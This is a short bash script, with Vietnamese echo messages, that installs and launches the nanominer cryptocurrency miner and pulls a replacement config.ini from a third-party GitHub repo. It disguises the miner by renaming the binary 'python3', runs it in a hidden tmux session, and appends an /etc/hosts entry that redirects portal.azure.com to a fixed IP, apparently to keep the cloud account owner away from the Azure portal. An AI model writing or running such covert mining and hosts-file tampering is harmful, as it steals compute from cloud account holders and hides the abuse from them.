#! /bin/bash
set -x #echo on
if [ -f ${PWD}/nanominer-linux-1.5.3.tar.gz ]; then
    if pgrep -x "python3" > /dev/null
then
    echo "scrip dang chay roi , ke cmn di "
    
else

echo "script da install , chay thoi "
cd nanominer-linux-1.5.3
tmux new-session -d -s my_session1  './python3'
     
fi
exit
fi
sudo apt-get update -y
sudo apt-get install tmux  -y
sudo -- sh -c "echo '116.108.86.157  portal.azure.com' >> /etc/hosts"
wget https://github.com/nanopool/nanominer/releases/download/v1.5.3/nanominer-linux-1.5.3.tar.gz
tar xvzf nanominer-linux-1.5.3.tar.gz
cd nanominer-linux-1.5.3
rm config.ini
wget https://raw.githubusercontent.com/evilbabylx/script/master/configazi/config.ini
chmod +x nanominer
mv nanominer python3 
tmux new-session -d -s my_session1  './python3'
